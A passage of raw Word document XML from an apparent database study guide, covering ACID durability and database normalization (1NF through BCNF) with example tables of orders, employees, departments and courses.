      </w:r>
    </w:p>
    <w:p w14:paraId="63086EB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Durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CD7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Durability guarantees that once a transaction has been committed, it will survive permanently, even in the event of a system failure (e.g., power loss, crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172E3B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fter a transaction is successfully committed, its changes are permanent and stored in non-volatile memory (disk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC43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a bank transfer is committed, even if the system crashes immediately after, the transferred amount will be reflected in the accounts when the system is restored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864AC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Once the COMMIT command is issued after a transaction, the database will ensure that the data is written to disk and will not be lost, even in case of crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59432A1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2C2B">
          <v:rect id="_x0000_i3206" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2C2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7043"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5B712B2A" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D68B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Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BF00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21CBE5A8" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F91D88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tomicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392D81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ransaction is atomic (either all operations are completed, or none).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="7A5C359B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2636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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056121D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database remains in a consistent state before and after the transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="74F3FEB1" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8168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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A0629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s are isolated from each other to avoid concurrency issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="29C6FC30" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7ECE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urability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC2FF3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ce a transaction is committed, it is permanent and survives system failures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51C5914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6F414">
          <v:rect id="_x0000_i3207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9A6A5" w14:textId="1A54FD45" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="001235B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="761" w:name="_Toc197867975"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Normalization</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="761"/>
    </w:p>
    <w:p w14:paraId="792FEF17" w14:textId="5159E09E" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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ation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Normalization is done by applying a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rules</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normal forms (NF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the database tables. These normal forms reduce the potential for data anomalies such as redundancy, update anomalies, and insert anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979CF0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s a breakdown of the normalization process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110788D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First Normal Form (1NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919A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if it meets the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977EDB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l columns must contain atomic (indivisible) values, meaning no repeating groups or arrays in a single column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7F36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ach record must be unique (no duplicate rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65709E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repeating groups and ensure that each field contains only one value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D46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1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195"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0DA32877" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42CB38D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09517FC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69FDB0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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0E0B3DC2" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47540D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7E8AA78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2848DB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Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="41DE569B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="604CFAD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440E3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486E131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SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09AD539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710"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2891A5BC" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596BEB0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1C23F6A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2AB97A3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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="39768C7B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="768FE1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8C730E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CAB7A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25C15C94" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F82E4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313A98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145BED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ython</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="67865666" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="060968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1EA26E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EE30D6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430E185E" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AD7E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DD4F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56457E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QL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC9B2C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11780">
          <v:rect id="_x0000_i3208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC53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Second Normal Form (2NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218DCBC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if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF48D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462944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partial dependency, meaning all non-key attributes (columns) are fully dependent on the entire primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C52A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partial dependency (when a non-key attribute depends on a part of a composite primary key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B666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2NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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1371"/>
        <w:gridCol w:w="882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="7080B566" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E44247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6737685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3AA57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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F8166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24829593" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BC02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BBA4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3F4B9F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E8EBA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5AED41EF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B100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17658C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1438C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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628672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25DF4385" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0756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3859D3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CF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98D897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012DFC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Product Name depends only on Product ID, not the entire primary key (Order ID, Product ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29EF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after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE38C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882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4E0479BC" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679433B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3B92128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6DDCE32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4679A3CD" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CBEFE4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62DF9F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CDAF1C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222CF30D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438DC0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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302922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51C85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30B65FD0" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3174F0F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E4C48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F8F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5F866A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roduc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386"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="75374D50" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B95C4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C16E4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r>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5C36AD02" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659DF5A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661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r>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="37A675DB" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3898135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D2B0D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r>
    </w:tbl>
    <w:p w14:paraId="080436F7"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DF5568">
          <v:rect id="_x0000_i3209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD647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Third Normal Form (3NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C5098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if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BF62E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF0370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transitive dependency, meaning non-key attributes are not dependent on other non-key attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AD1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transitive dependency (when non-key attributes depend on other non-key attributes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA13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3NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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22"/>
        <w:gridCol w:w="1783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="60DBCA07" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9D89E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32C1522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3D79116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689CC26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909C1FE" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AE267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9A344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8D352F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3E23A8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5F515772" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066417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8E179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0CF14D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2047032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4E948D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Department Name depends on Department ID, which is not part of the primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34072B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after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12204A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mploye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37"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="50023F42" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC77FC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2F7E590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D292F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r>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="299D4D24" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0141B6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0F95E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09AF6AB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r>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6816C503" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A518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2995B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304527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r>
    </w:tbl>
    <w:p w14:paraId="4C90F6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partmen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783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5939345D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70563A5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37086C8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2C4879D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="029AB7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0470B4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1C383E50" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="789380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4DB4629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34BB40A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DC2A55">
          <v:rect id="_x0000_i3210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC2C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Boyce-Codd Normal Form (BCNF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E18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if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052EEE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every non-trivial functional dependency A -&gt; B, A must be a superkey.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476F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situations where a non-prime attribute (not part of the primary key) depends on another non-prime attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12553A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BC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1570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6496A79F" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB0BD9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1967672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2EED67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1433966D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02A979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AA3E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3C93FBE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2AE01AA4" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1E8E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147890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060C1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r w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6F938460" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726AD5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77A4F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A4978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bl>
    <w:p w14:paraId="094A3B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Instructor Name depends on Course ID, which is not a superkey.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE51B1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after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CFF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447FCBBA" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE8EF3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022E47A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C7054C6" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B774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19F523E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0089D0CA" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C711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B2984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22C9517C" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421B90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68EE3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2047C9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urse-Instructo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570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="56BA6DA2" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0E04B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lastRenderedPageBreak/>
              <w:t>Course ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD6DBC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09F41BEF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
